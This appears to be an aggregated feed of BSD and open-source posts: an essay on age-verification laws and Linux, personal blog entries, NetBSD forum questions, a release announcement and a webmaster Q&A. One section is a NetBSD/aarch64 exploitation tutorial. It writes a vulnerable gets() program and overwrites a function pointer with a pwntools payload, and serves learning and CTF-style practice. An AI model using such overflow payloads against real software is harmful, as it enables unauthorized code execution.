Several US states, the country of Brazil, and I’m sure other places in the world have enacted or are planning to enact laws that would place the burden of age verification of users on the shoulders of operating system makers. The legal landscape is quite fragmented at this point, and there’s no way to tell which way these laws will go, with tons of uncertainties around to whom these laws would apply, if it targets accounts for application store access or the operating system as a whole, what constitutes an operating system in the first place, and many more. Still, these laws are already forcing major players like Apple to implement sharing self-reported age brackets with application developers (at least in iOS), so there’s definitely something happening here.

In recent weeks, the open source world has also been confronted with the first consequences of these laws, as both systemd and xdg-desktop-portal have responded to operating system-level age verification laws in, among other places, California and Colorado, by adding birthDate to userdb (on systemd’s side) and developing an age verification portal (on xdg-desktop-portal’s side) for use by Flatpaks. The age verification portal would then use the value set in usrdb’s birthDate as its data source. The value in birthDate would only be modifiable by an administrator, but can be read by users, applications, and so on.

Crucially, this field is entirely optional, and distributions, desktop environments, and users are under zero obligation to use it or to enter a truthful value. In fact, contrary to countless news items and comments about these additions, nothing about this even remotely constitutes as “age verification”, as nothing – not the government, not the distribution or desktop environments, not the user – has to or even can verify anything. If these changes make it to your distribution, you don’t have to suddenly show your government ID, scan your face, or link your computer to some government-run verification service, or even enter anything anywhere in the first place.

Furthermore, while the xdg-desktop-portal’s proposals are still fluid and subject to change, consensus seems to be to only share age brackets with applications, instead of full birth dates or specific ages – assuming anything has even been entered in the birthDate field in the first place. Even if your Linux distribution and/or desktop environment implements everything needed to support these changes and expose them to you in a nice user interface, everything about it is optional and under your full control. The field is of the same type as the existing fields emailAddress, realName, and location, which are similarly entirely optional and can be left empty if desired.

Taken in isolation, then, as it currently stands, there’s really not much meat to these changes at all. The primary reason to implement these changes is to minimally comply with the new laws in California, Colorado, Brazil, and other places, and it’s understandable why the people involved would want to do so. If they do not, they could face lawsuits, fines, or worse, and I don’t know about you, but I wouldn’t want to be on the receiving end of the western world’s most incompetent justice system. Aside from that, these changes make it possible to build robust parental controls, which isn’t mentioned in the original commits to systemd, but is clearly the main focal point of xdg-desktop-portal’s proposal.

This all seems well and good, but given today’s political climate in the United States, as well as the course of history, that “as it currently stands” is doing a lot of heavy lifting. Rightfully so, a lot of people are worried about where this could lead. Sure, today these are just inconsequential, optional changes in response to what seems to be misguided legislation, but what happens once these laws are tightened, become more demanding, and start requiring a lot more than just a self-reported age bracket?

In Texas, for instance, H.B. 1131 requires any commercial entity, including websites, that contains more than one-third “sexual material harmful to minors” to implement age verification tools using things like government-issued IDs or bank transaction data to verify visitors’ ages before allowing them in. The UK has a similar law on the books, too. It’s not difficult to imagine how some other law will eventually shift this much stricter, actual age verification from websites and applications into operating systems instead. What will systemd’s and xdg-desktop-portal’s developers do, then? Will they comply as readily then as they do now?

This is a genuine worry, especially if you already belong to a group targeted by the current US administration, or were face-scanned by ICE at a protest. Large groups of especially religious extremists consider anything that’s LGBTQ+ to be “sexual material harmful to minors”, even if it’s just something normal like a gay character in a TV show. It’s not hard to imagine how age verification laws, especially if they force age verification at the operating system level, can become weaponised to target the LGBTQ+ community, other minorities, and people protesting the Trump regime.

You may think this won’t affect you, since you’re using an open source operating system like desktop Linux or one of the BSDs, and surely they are principled enough to ignore such dangerous laws and simply not comply at all, right? Sadly, here’s where the idealism and principles of the open source world are going to meet the harsh boot of reality; while open source software has a picturesque image of talented youngsters hacking away in their bedrooms, the reality is that most of the popular open source operating systems are actually hugely complex operations that require a ton of funding, and that funding is often managed by foundations. And guess where most popular Linux distributions’ and BSD variants’ foundations are located?

Developers from all over the world may contribute to Debian, but all of its financials and trademarks are managed by Software in the Public Interest, domiciled in New York State. Fedora is part of Red Hat, owned by IBM, and we all know IBM. Arch Linux’ donations are also managed by Software in the Public Interest. The Gentoo Foundation is domiciled in New Mexico. The FreeBSD Foundation is domiciled in Boulder, Colorado. The NetBSD Foundation is domiciled in Delaware. Ubuntu is a Canonical product, a company headquartered in London, UK, a country with strict age verification laws for websites and applications. Hell, even Haiku, Inc. is domiciled in New York State. I could go on, but you get the gist: all of these projects manage their donations, financials, trademarks, and related issues in the United States (or the UK for Ubuntu).

It’s relatively easy for these projects to take a principled stance against the relatively limited age verification laws that exist today, but what about if and when these laws are expanded to infiltrate the very operating systems we use? It’s easy to resist the boot when it’s pressing down on some porn website or a sex worker’s OnlyFans page, but once that same boot is pressing down on your own throat? That’s a whole different story. Will Debian, FreeBSD, or Fedora still stand their ground when the organisations managing their donations, finances, and trademarks become the target of lawsuits or the US justice system, because they refuse to implement age verification?

I sincerely doubt it.

And this is why I am of two minds about this issue. On the one hand, I fully understand that the various developers involved with these efforts want to make sure they follow the law and avoid getting fined – or worse – especially since compliance requires so little at this time. On top of that, these changes make it possible to implement a fairly robust set of parental controls in a centralised way, keeping the data involved where it makes sense, so it also brings a number of benefits for users. There really isn’t anything to worry about when looking at these changes in isolation.

On the other hand, though, I also understand the fears and worries from people who see these changes as the first capitulation to age verification, nicely making the bed for much stricter age verification laws I’m sure certain parts of the political compass are already dreaming about. With so many Linux distributions, BSD variants, and even alternative operating systems having their legal domiciles in the United States, it’s not unreasonable to assume they’re going to fold under any possible legal pressure that comes with such laws.

I’m not rushing to replace my Fedora KDE installations with something else at this point, but I’m definitely going to explore my options on at least one of my machines and go from there, so I at least won’t be caught with my pants down in the future. The world isn’t ending, age verification hasn’t come to Linux, but we’d all do well to remain skeptical and prepare for when it does make its way into our open source operating systems.

Clara and I are thinking of getting a Raspberry Pi 400 (or 500?) as a lounge computer. Currently we use an Apple TV and a PlayStation 3 [sic] as our media playback devices, but the app(lication) selection is beginning to limit what we can do with them. For example, we also want to move off Plex, and the options for Jellyfin aren’t great.

The rational thing would be buy to buy a mini PC of some sort, connect it to the TV, then use a wireless keyboard/trackpad combo to control it. But then, when I have ever taken the rational or sensible approach to anything? And perhaps even more importantly, where is the fun in that?

This need reminded me of the Raspberry Pi 400, the device by the eponymous company that integrates a souped-up Pi motherboard into a keyboard device. A Pi 400 in such an arrangement would let us keep the “lounge PC” on the coffee table, and run a glorified web browser with everything from Jellyfin and Navidrome, to Internet radio. Heck, in a pinch it could even run some classic DOS games.

Granted, it’d need at least an HDMI cable and power lead from the device to the TV, but then we do the same thing for our beloved Commodore machines anyway. There’s a part of me that relishes the idea of having the same experience for our media.

At least, that’s where we were a week ago. Since then, I was reminded about the Orange Pi family of devices, and the Orange Pi 800 that bears… shall we say, an uncanny resemblance to the aforementioned raspberry-flavoured unit. Of note for me is its inclusion of a 128 GiB eMMC storage device, which would certainly be more robust.

I suppose the challenge with these “not Pis” is support. Raspberry Pis are ubiquitous, and barring universal distributions like Armbian, have far more support among OS vendors and projects. Could I run NetBSD on an Orange Pi 800? I mean, maybe. But I know I would on a Pi 400.

Anyway, another shaggy-dog post for your Sunday!

By Ruben Schade in Sydney, 2026-03-22.

People like unboxing posts and videos, right? I reckon it’ll also be a fun distraction from the horrendous pain I’m in for a medical misadventure that’s been ongoing for weeks at this point (I’ll be fine thank you, but if you can’t vent on your own blog, where can you?).

My new machine just arrived today, and here’s the box in all its cardboard glory, alongside my two current personal laptops. Reassuringly, we have a lithium battery warning, so I’ll be able to use this laptop without having it plugged in. Did I tell you I’m in pain, so you have to pretend my jokes are funny?

I kid, but this is exciting. It’s like a watch fan getting a new timepiece, or someone interested in shoes buying… shoes? For all the cynicism that has seeped into the blog of late, I still do love researching and using computers. They’re fun! It’s easy for work to justify regular fleet refreshes, but I tend to stick with the same personal laptops for half a decade or more. If the shoes fits…, as the aforementioned shoe fan would say. Wow, my thesaurus is failing me today.

I wrote about buying this machine in late February. This is to replace my M1 MacBook Air, and my various second-hand ThinkPads as my primary personal laptop. This will likely run Fedora, for the reasons I used Macs for more than two decades (aka, software support for what I need), and FreeBSD-CURRENT so I can hopefully start contributing to the project in a more meaningful way. Ditto NetBSD as well eventually.

Cutting through the surprisingly small Think Sustainable tape, the first internal flap opens up to this ThinkPad logo that would have been hidden before. That’s a cute touch.

Speaking of cute touches, the first compartment I lifted out had the 65 W power brick, which thankfully is USB C. It’s quite small, was wrapped in paper for some reason, and comes with an Australian power lead.

And now for the main event! As I said above, this is all new for me; I’ve had half a dozen ThinkPads over the years, but they’ve only ever been second hand. I’ve absolutely loved them, and even enjoy typing on the “island key” keyboards more than any other modern laptop. MacBooks have beaten them in the display department since forever, but with the 2.8K IPS on this one, I’m hoping I’ll finally have a FreeBSD/Linux notebook with an amazing keyboard, nice display, and the software I love using, all in the one machine.

I was surprised lifting this out to see a thin cotton bag, and a more chipper message than I would have expected from a business brand like this.

Pulling out the new machine and opening it up also showed some more of this cotton-like packing material, this time with some first time use instructions. If you’re going to be protecting the screen in transit, may as well use the paper for something useful.

And here she is, the ThinkPad E14 Gen 7 alongside my retiring M1 MacBook Air. After twenty five years of using iBooks and MacBooks, and thirty years of using Macs at home, this is the last one. Bye Tim.

I have to say, for all the thoughts ThinkPad fans have about the E series machines, I’m extremely impressed with how this one is put together. It doesn’t feel cheap or nasty at all; it’s in another league compared to the craptops our local electronics store has. The keyboard is shallower than my X230, but still feels amazing. And look at that matte display! No more headache-inducing reflections! And a TrackPoint! I never thought I’d have the world’s best pointing device on my primary machine.

The next step will be to wipe whatever unserious OS it currently has, and put the aforementioned FreeBSD and Fedora on it. I’m also undecided whether to have the hostname be hitagi.lan from the Monogatari universe, which for some reason I always give my current ThinkPad, or to retire the anime names for a classic Star Trek ship again. I don’t know, I’m getting serious excelsior.lan vibes from this machine. Oh my.

That’s it for this unboxing. Join me in another five to seven years here when I get my next personal laptop… maybe!

By Ruben Schade in Sydney, 2026-03-17.

I had insomnia last night, and thought it’d be fun to compile this list. Thank you.

• awk(1)
• bhyve
• Call for Testing
• Dragonfly BSD
• ee(1)
• FreeBSD
• got(1)
• httpd(1)
• illumos (I know, technically not…)
• Jails
• ksh(1)
• libressl
• meta-pkgs
• NetBSD
• OpenBSD
• pkgsrc
• quota
• rubenerd.com/tag/bsd/
• sparc
• tcsh(1)
• ufs2
• Vinyl Cache
• Wine
• Xfce
• who(1) are you… who who?
• ZFS

I will expand on my inclusion of Wine at some point, because it’s found surprising utility in a few places.

By Ruben Schade in Sydney, 2026-03-13.

Back in January I introduced my LLM Licence. For the cost of a donation to one of a few different technical foundations in which I harbour a keen interest and admiration, the licence would grant you permission to use an LLM trained on my works for a query.

It was tongue-in-cheek, but it did generate a surprising amount of feedback. This was among the most common responses:

How would you enforce it?

It’s a fascinating question; not for what it’s asking per se, but what it reveals about how we approach everything in this brave new world. The tl;dr is: it’s an honour system built on trust. And it should sound familiar.

☕︎ ☕︎ ☕︎

I don’t want to get into a debate over the merits of permissive, copyleft, and commercial software licences here, not least because I’ll have my head chewed off, and I’m rather attached to it. Haiyo.

But licences dictate the terms under which you can purchase, distribute, and/or modify the software, and how to acknowledge and grant sufficient credit to the source. Unless a program and its source have been released into the public domain (which may not always be feasible or possible depending on the jurisdiction), it almost certainly has a licence attached.

Commercial software often requires digital restrictions management (DRM), “activation”, serial numbers, licencing servers, indentured servitude, and other infrastructure to register, maintain, and enforce licencing terms. Ask me how I know! Even some freeware still requires this, because while they may not cost any money to buy, the owners of software prefer to be like those people crowding around the mustard dispenser at IKEA and keep the source to themselves. I joke, but people have every right to release their own creative works as they see fit.

Open software, by comparison, rarely has such distribution enforcement. Some hat-based software houses may inject their own trademarks or copyright in other ways to limit wholesale distribution, but otherwise most such software comes with the source, and perhaps even some pre-compiled binaries for our joy and convenience. It’s up to you to be responsible and to enact what’s required in exchange for the goods.

Taking responsibility… wait, what!?

This is a critical difference to understand. There is no licencing server phoning home to make sure my use of NetBSD is compliant with the 2-clause BSD licence. Alpine Linux doesn’t require me to install Client Access Licences for every SSH connection to my Xen host. At least, I hope not. And when even the whiff of passive telemetry is introduced into an open source package, let alone an overt rug pull, it causes such an uproar as to result in a hard fork.

☕︎ ☕︎ ☕︎

This is what makes the discussion around liability language models (LLMs) contributions to open software so surreal. Having spent decades teaching the industry about how permissive and copyleft licencing works, everyone seemingly forgot as soon as their stochastic parrots enter the picture. Maybe they used a chatbot to do their assignments.

The reason this is coming up now is due to more projects restricting or banning LLM-derived contributions. If they deem slop doesn’t meet their quality, authenticity, or licencing requirements, or they introduce legal liability, or they increase the workload for already tired reviewers, project maintainers have every right to deny such code. If you don’t like it, fork it.

(As an aside, they should absolutely do that! A forked project with LLM or “vibed” contributions that overtakes the original in performance, features, and security would surely present quantitative, irrefutable validation of the hype).

But this leads to that question people asked me at the start:

How would you enforce it?

The same way every other requirement is enforced: with a social contract. Projects have terms and policies in place under which they’ll accept contributions. LLM restrictions are another of these, with the same “enforcement” mechanism.

That’s it. There’s no silver bullet here. You can hoard changes to your GPL’d code and not submit them upstream. You can lift and submit code from somewhere you’re not allowed. You can also contribute slop that you’ve attempted to pass off as your own. I don’t know how else to say this, but maliciously working around contribution requirements is on you. I almost wrote that as ewe for some reason, so have this emoji of a sheep. 🐑

Licences are, sadly, only worth the amount people are willing to enforce them. But broadly speaking, that’s how open source software communities work. There’s a degree of trust that you’ll take responsibility and do the right thing. I know right, what a concept!

By Ruben Schade in Sydney, 2026-03-12.

For some time, I have ventured into low(er)level hacking & cybersecurity at OverTheWire and pwn.college. Today, a LOT of security & hacking is focussed on Linux/x86, but we all know there is more. More operating systems, and more CPUs. In the area of binary exploitation, I wondered if the basic tools for that work on NetBSD/aarch64 (ARM), and I had a look. Spoiler: they do!

Here's an example of pwning on NetBSD/aarch64 (ARM).

Preparation

Step 0: Install NetBSD/aarch64, e.g. in qemu.

Setup the basics:

su root -c pkg_add -v https://cdn.netbsd.org/pub/pkgsrc/packages/NetBSD/aarch64/11.0_2025Q4/All/pkgin-25.10.0.tgz
su root -c "pkgin install sudo"
sudo pkgin install bash

Install pwntools & friends:

sudo pkgin install python311 # not newer... pwntools...
sudo pkgin install rust
sudo pkgin install cmake pkg-config openssl
sudo pkgin install gmake
sudo pkgin install vim # for xxd, not the shoddy editor that comes with it

When going for pwntools & friends, python 3.11 is the version of choice - newer versions of python are not supported there:

python3.11 -m venv venv-pwn
. ./venv-pwn/bin/activate
pip install "capstone<6" pwntools # same as on macos with angr

Install gef in its usual place, just in case:

sudo mkdir -p /opt/gef
sudo wget https://github.com/hugsy/gef/raw/main/gef.py -O /opt/gef/gef.py

gdb - better colors etc. via .gdbinit (default gdb really looks bad on black terminals):

(venv-pwn) qnetbsd$ cat ~/.gdbinit
#set disassembly-flavor intel # disable on ARM :-)
set follow-fork-mode child

set style address foreground cyan
set style function foreground cyan
set style disassembler immediate foreground cyan

pwn v1

First pwn attempt:

#include <stdio.h>
#include <stdlib.h>

void win(void)
{
	printf("Goodbye, winner.\n");
	exit(0);
}

void vuln(void)
{
	char name[16];

	printf("What is your name? ");
	gets(name);
	printf("Hello %s\n", name);

	return;
}

int main(void)
{
	vuln();
	return 0;
}

Due to differences between x86 and ARM, a simple buffer overflow to overwrite e.g. the return address cannot be done. On ARM, the return address of a function is not stored on the stack but in the X30 register. The crash observed when running this is due to random other values being overwritten.

(venv-pwn) qemubsd$ gcc -ggdb win1.c -o win1
ld: /tmp//ccdWZtt2.o: in function `vuln':
/home/feyrer/tmp/win1.c:15:(.text+0x34): warning: warning: this program uses gets(), which is unsafe.
(venv-pwn) qemubsd$ pwn checksec  win1
[!] Could not populate PLT: Failed to load the Unicorn dynamic library
[*] '/home/feyrer/tmp/win1'
    Arch:       aarch64-64-little
    RELRO:      No RELRO
    Stack:      No canary found
    NX:         NX disabled
    PIE:        No PIE (0x200100000)
    RWX:        Has RWX segments
    Stripped:   No
    Debuginfo:  Yes

Not that many security features on by default. What's going on, NetBSD?! Ignoring this for now, let's look at the assembly code:

(venv-pwn) qnetbsd$ gdb -q -ex 'disas vuln' win1
Reading symbols from win1...
Dump of assembler code for function vuln:
   0x00000002001009f4 <+0>:	stp	x29, x30, [sp, #-32]!
   0x00000002001009f8 <+4>:	mov	x29, sp
   0x00000002001009fc <+8>:	adrp	x0, 0x200100000
   0x0000000200100a00 <+12>:	add	x0, x0, #0xaf8
   0x0000000200100a04 <+16>:	bl	0x200100730 <printf@plt>
   0x0000000200100a08 <+20>:	add	x0, sp, #0x10
   0x0000000200100a0c <+24>:	bl	0x200100790 <gets@plt>
   0x0000000200100a10 <+28>:	add	x0, sp, #0x10
   0x0000000200100a14 <+32>:	mov	x1, x0
   0x0000000200100a18 <+36>:	adrp	x0, 0x200100000
   0x0000000200100a1c <+40>:	add	x0, x0, #0xb10
   0x0000000200100a20 <+44>:	bl	0x200100730 <printf@plt>
   0x0000000200100a24 <+48>:	nop
   0x0000000200100a28 <+52>:	ldp	x29, x30, [sp], #32
   0x0000000200100a2c <+56>:	ret
End of assembler dump.
(gdb)

Note the STP and LDP instructions which save and restore the X29 (frame pointer) and X30 (return address) registers of the calling function (main). By overwriting them, main's "RET" will do funny things. While this can still be exploited, let's make things a bit easier in the next attempt.

pwn v2

Here we add a function pointer "goodbye" that can be overwritten:

#include <stdio.h>
#include <stdlib.h>

void lose(void)
{
	printf("Goodbye, loser.\n");
	exit(0);
}

void win(void)
{
	printf("Goodbye, winner.\n");
	exit(0);
}

void vuln(void)
{
	void (*goodbye)(void) = lose;
	char name[16];

	printf("What is your name? ");
	gets(name);
	printf("Hello %s\n", name);

	goodbye();

	return;
}

int main(void)
{
	vuln();
	return 0;
}

It's pretty obvious what's happening, but for the sake of completeness:

(venv-pwn) qnetbsd$ echo huhu | ./win2
What is your name? Hello huhu
Goodbye, loser.

Let's look at the assembly output again:

(venv-pwn) qnetbsd$ gdb -q -ex 'disas vuln' win2
Reading symbols from win2...
Dump of assembler code for function vuln:
   0x0000000200100a10 <+0>:	stp	x29, x30, [sp, #-48]!
   0x0000000200100a14 <+4>:	mov	x29, sp
   0x0000000200100a18 <+8>:	adrp	x0, 0x200100000
   0x0000000200100a1c <+12>:	add	x0, x0, #0x9d8
   0x0000000200100a20 <+16>:	str	x0, [sp, #40]
   0x0000000200100a24 <+20>:	adrp	x0, 0x200100000
   0x0000000200100a28 <+24>:	add	x0, x0, #0xb38
   0x0000000200100a2c <+28>:	bl	0x200100730 <printf@plt>
   0x0000000200100a30 <+32>:	add	x0, sp, #0x18
   0x0000000200100a34 <+36>:	bl	0x200100790 <gets@plt>
   0x0000000200100a38 <+40>:	add	x0, sp, #0x18
   0x0000000200100a3c <+44>:	mov	x1, x0
   0x0000000200100a40 <+48>:	adrp	x0, 0x200100000
   0x0000000200100a44 <+52>:	add	x0, x0, #0xb50
   0x0000000200100a48 <+56>:	bl	0x200100730 <printf@plt>
=> 0x0000000200100a4c <+60>:	ldr	x0, [sp, #40]               <===
=> 0x0000000200100a50 <+64>:	blr	x0                          <===
   0x0000000200100a54 <+68>:	nop
   0x0000000200100a58 <+72>:	ldp	x29, x30, [sp], #48
   0x0000000200100a5c <+76>:	ret
End of assembler dump.
(gdb)

Note the LDR and BLR instructions at 0x0000000200100a4c - The X0 register is loaded with our function pointer by LDR, and BLR does the actual call.

By overwriting the pointer, we can call another function. Let's use pwn cyclic to find out what's actually in x0 at the time of the BLR call:

(venv-pwn) qnetbsd$ pwn cyclic 100 >c
(venv-pwn) qnetbsd$ gdb  -q -ex 'set pagination off' -ex 'b *0x0000000200100a50' -ex 'run <c' -ex 'i r x0' win
Reading symbols from win...
Breakpoint 1 at 0x200100a50: file win.c, line 25.
Starting program: /home/feyrer/tmp/win <c
What is your name? Hello aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa

Breakpoint 1, 0x0000000200100a50 in vuln () at win.c:25
25		goodbye();
x0             0x6161616661616165  7016996786768273765
(gdb) ! pwn cyclic -l 0x6161616661616165
16
(gdb) print win
$1 = {void (void)} 0x2001009f4 <win>

The function pointer is 16 bytes from the start of our name buffer, and we have the address of the win function. So let's construct our input:

(venv-pwn) qnetbsd$ python3 -c 'from pwn import * ; p = b"A" * 16 + p64(0x2001009f4); sys.stdout.buffer.write(p)' | xxd
00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000010: f409 1000 0200 0000                      ........

Looks good, so call it:

(venv-pwn) qnetbsd$ python3 -c 'from pwn import * ; p = b"A" * 16 + p64(0x2001009f4); sys.stdout.buffer.write(p)' | ./win2
What is your name? Hello AAAAAAAAAAAAAAAA
Goodbye, winner.
(venv-pwn) qnetbsd$ uname -a
NetBSD qnetbsd 11.0_RC2 NetBSD 11.0_RC2 (GENERIC64) #0: Wed Mar  4 21:02:00 UTC 2026  [email protected]:/usr/src/sys/arch/evbarm/compile/GENERIC64 evbarm

Success

Voila, ARM pwnage on NetBSD! :-)

(venv-pwn) qnetbsd$ echo huhu | ./win2
What is your name? Hello huhu
Goodbye, loser.
(venv-pwn) qnetbsd$ python3 -c 'from pwn import * ; p = b"A" * 16 + p64(0x2001009f4); sys.stdout.buffer.write(p)' | ./win2
What is your name? Hello AAAAAAAAAAAAAAAA�
Goodbye, winner.
(venv-pwn) qnetbsd$ uname -a
NetBSD qnetbsd 11.0_RC2 NetBSD 11.0_RC2 (GENERIC64) #0: Wed Mar  4 21:02:00 UTC 2026  [email protected]:/usr/src/sys/arch/evbarm/compile/GENERIC64 evbarm 

I'm positively impressed by the whole toolchain working as expected, given that e.g. pwntools starts compiling rust when installing. Well done, NetBSD!

On security & compiler flags

(venv-pwn) qemubsd$ gcc -ggdb -fstack-protector-all -fpie -pie -Wl,-z,relro,-z,now win1.c -o win1-prot
ld: /tmp//ccE3ncle.o: in function `vuln':
/home/feyrer/tmp/win1.c:15:(.text+0x64): warning: warning: this program uses gets(), which is unsafe.
(venv-pwn) qemubsd$ pwn checksec win1-prot
[!] Could not populate PLT: Failed to load the Unicorn dynamic library
[*] '/home/feyrer/tmp/win1-prot'
    Arch:       aarch64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX disabled
    PIE:        PIE enabled
    RWX:        Has RWX segments
    Stripped:   No
    Debuginfo:  Yes

1st try: VirtualBox

Download:
https://cdn.netbsd.org/pub/NetBSD/NetBSD-11.0_RC2/evbarm-aarch64/binary/gzimg/arm64.img.gz

Convert img to VDI:

qemu-img convert -f raw -O vdi arm64.img arm64.vdi

Setup VirtualBox VM with .vdi file as existing harddisk.

Result: VirtualBox (not the VM!) crashed. Oh well.

2nd try: QEMU

After VirtualBox didn't work, I wanted to see if qemu (running on MacOS) works. Spoiler: it does, and here are the steps to get things going:

First, grab the kernel:
https://cdn.netbsd.org/pub/NetBSD/NetBSD-11.0_RC2/evbarm-aarch64/binary/kernel/netbsd-GENERIC64.img.gz
...and gunzip. Make sure kernel and userland versions match!

Run in QEMU:

qemu-system-aarch64 -M virt,accel=hvf -cpu host -smp 4 \
	-m 4g -drive if=none,format=raw,file=arm64.img,id=hd0 \
	-device virtio-blk-device,drive=hd0 -netdev user,id=net0 \
	-device virtio-net-device,netdev=net0 -kernel netbsd-GENERIC64.img \
	-append root=dk1 -nographic

How to leave QEMU: Ctrl-A X

Troubleshooting: Make sure kernel and userland match - else random segfaults will happen.

Userland setup

Quite a few settings are already OK (sshd, dhcpcd, ntp), which is not the default I remember from a few years ago, but that's nice and convenient. I still wanted to see what config settings are new, and here are my additions to /etc/rc.conf:

hostname="qnetbsd"
rndctl=yes
certctl_init=yes
ip6mode=autohost
ntpdate=NO

On first login you will see an unsafe keys warning:

-- UNSAFE KEYS WARNING:

        The ssh host keys on this machine have been generated with
        not enough entropy configured, so they may be predictable.

        To fix, follow the "Adding entropy" section in the entropy(7)
        man page.  After this machine has enough entropy, re-generate
        the ssh host keys by running:

                /etc/rc.d/sshd keyregen

Fix by feeding entropy, then reboot:

echo lkajsdflkjasdflkjasdlkfjoiasjdfiojasdkf >/dev/random
shutdown -r now

Note: Use shutdown(8), not reboot(8) or poweroff(8) - only shutdown runs the hooks that save entropy.

After reboot, regenerate SSH keys:

/etc/rc.d/sshd keyregen

Success

neuland% qemu-system-aarch64 -M virt,accel=hvf -cpu host -smp 4 -m 4g \
  -drive if=none,format=raw,file=arm64.img,id=hd0 \
  -device virtio-blk-device,drive=hd0 \
  -netdev user,id=net0 -device virtio-net-device,netdev=net0 \
  -kernel netbsd-GENERIC64.img -append root=dk1 -nographic
[   1.0000000] NetBSD/evbarm (fdt) booting ...
[   1.0000000] NetBSD 11.0_RC2 (GENERIC64) #0: Wed Mar  4 21:02:00 UTC 2026
...
NetBSD/evbarm (qnetbsd) (constty)

login: root
NetBSD 11.0_RC2 (GENERIC64) #0: Wed Mar  4 21:02:00 UTC 2026
Welcome to NetBSD!

qnetbsd# uname -a
NetBSD qnetbsd 11.0_RC2 NetBSD 11.0_RC2 (GENERIC64) #0: Wed Mar  4 21:02:00 UTC 2026  [email protected]:/usr/src/sys/arch/evbarm/compile/GENERIC64 evbarm

Summary

Not providing a working VirtualBox image in 2026 is painful for new users. As Kali Linux works fine in VirtualBox on the same hardware, I'd say there is some way to go, NetBSD!

The manual setup works, but needs some tweaks beyond the expected (/etc/rc.conf), exp. manual entropy setup was surprising as network and disk were working ok. I did expect those to be used as sources of randomness before the first SSH keys are generated.

We'll see where things go from there. For now I can (at least for QEMU on my Mac) say: Of course it runs NetBSD! :-)

Hello, I installed bash in NetBSD using pkg_add. The shell works and I want to run it inside a chroot dir. But the bash executable isn't seen while it's there including 3 binary dependencies.
If I place it in the chroots /bin, which I don't agree with, it still says no such file or directory, while the program is there with executable permissions, recognized executable format and dependencies. It also works from outside the chroot dir, but inside it's "file not found", which is not true. All commands can see the file except when called as chroot parameter from outside.
I found several web mentions of the problem but no cause or solution. What am I missing? Do I have to refresh the dll stack like with ldconfig -R in FreeBSD? Also, I copied most of the native system parts tp the chroot dir. Does anything still need special file flags?

The NetBSD project is pleased to announce the second release candidate of the upcoming 11.0 release, please help testing!
See the release announcement for details.

The netbsd-11 release branch is nearly a year old now, so it is high time the 11.0 release makes it to the front stage.

Unfortunately the first release candidate had a few defects that we had to fix, including speed enhancements for the ftp(1) client when downloading large files, an updated tmux(1), reliability fixes for blocklistd(8) and fixes for the Mesa library. See the changes document for details.

Please note that various ISO images have been split into small ones for CD/R media and full featured DVD ones. If you are not restricted by the size limits of a CD/R medium, make sure to pick the image with "-dvd.iso" in the name.

If you want to test 11.0 RC2 please check the installation notes for your architecture and download the preferred install image from the CDN or if you are using an ARM based device from the netbsd-11 builds from the bootable ARM images page.

If you have any issues with installation or run into issues with the system during use, please contact us on one of the mailing lists or file a problem report.

A week ago I installed NetBSD 10.1 on a WD Blue 500GB disk. I built and installed a few kernels. Everything worked fine. I was working on porting a bunch FreeBSD system install scripts to recreate my daily environment. I did some tests with mount_null in particular but nothing spectacular. Suddenly the NetBSD disk dropped to a panic during the kernel boot.. I can make and post pictures of 2 screens with text but it says nothing special afaik. Init crashes. We enter a db prompt with a few commands. Any chance to go on from here?
After the problem happened, I still rescued all files that I was working on with a FreeBSD laptop, so I lost nothing. The disk didn't show any read/write problems. I also copied a kernel from a NetBSD install memstick to it but that makes no difference. What can be going on here? Now installing NetBSD on another disk. It might be a weird failure that only happens under specific operation.

This is follow-up to the earlier onslaught of questions I subjected you all to last Friday.

51. What about under-utilised practices, or things you think people should do more?

Walk slow and fix things.

52. Do you use a lot of semantic HTML? Or are you guilty of generic structure?

HTML comes with most of the elements you could need to markup a page. If you use it correctly, most of your identifiers and classes for CSS aren’t necessary.

53. Do you consider different browsers?

Text-based browsers like Links are great for testing accessibility.

54. Speaking of, what’s your preferred browser? Convince your readers why they should use it.

I don’t anymore.

55. And what OS are you on?

At home I run FreeBSD, NetBSD, Alpine, Fedora, DOS, CP/M, and other retro nonsense. I’m still on a Mac for work.

56. Do you have a strong opinion on that, or do you just happen to use it?

I subscribe to use what works. Which, conveniently, means BSD most of the time.

57. Are your websites mobile-friendly?

I think so.

58. What are your thoughts on autoplay?

It’s a symptom of the wider lack of respect modern sites have for readers.

59. What are your thoughts on webrings? Are you in any?

I was in 1999!

60. Do you have any web shrines? What do you like to see in that sort of page?

I used to for Sailor Mercury when I was a kid, if I’m understanding the question. I haven’t thought about that for years.

61. Are your websites “cliche”, in your opinion?

My opinion is the only one I have, but here it’s lacking.

62. What is your ideal website? Are you striving for that, or for something else?

Something simple, but not too simple. Navigation should be mandatory, though some minimalist sites even eschew (gesundheit) that.

63. Are you an artist? Do you draw or design your own assets?

I wish I was. Fortunately, I’m engaged to one who can draw me mascots and assets ^^/.

64. What are your favourite resource sites?

Wikimedia Commons. A vastly under-appreciated resource.

65. Is there a habit you just can’t get away from no matter how hard you try?

Self-doubt.

66. What’s your biggest advice for a new webmaster?

Don’t overthink things. Being scrappy and authentic will always win over artificial slop. But also, don’t take advise from Internet strangers as rote.

67. Do you keep all your styling in CSS? Or do you hard-code some?

I think this is referring to having CSS in an external file, and inline CSS. I mostly do the former, but the latter is useful if you want to preserve certain styling in RSS.

68. What do you think of frameset layouts?

You’re not supposed to like them, but they did solve a problem back in the day. There are better, more accessible ways now.

69. How about table-based layouts?

The fact it took CSS years to replicate something as predictably and easily as a table-based layout was definitely silly.

70. Do you subscribe to the ideas of "one-column", "two-column" and "three-column" layouts? Do you use any of these?

As long as they’re responsive and gracefully degrade, multiple columns are fine.

71. Do you spend longer on the HTML or the CSS?

I spend longer on the server side, admittedly.

72. Have you ever made a page with no CSS? It’s useful for your thoughts.

Yes, my Retro Corner uses HTML 3.2.

73. Do you ever find yourself making layouts with nothing to put on them? Or do you only make layouts when the need arises?

I’ve made a few for fun, and subsequently never found a use for them. One is a Filofax binder using the colour scheme from Lotus Organiser. It was a lot of fun.

74. Would you consider yourself a beginner? Or advanced? Somewhere in the middle?

I’m moderately advanced on the server side. I’ll let you be the judge in the design department.

75. Do you have a habit of looking at the source code of websites you visit?

Yes. Also HTTP headers, and RSS feeds. I love seeing the nuggets people hide.

76. How did YOU learn how to make websites?

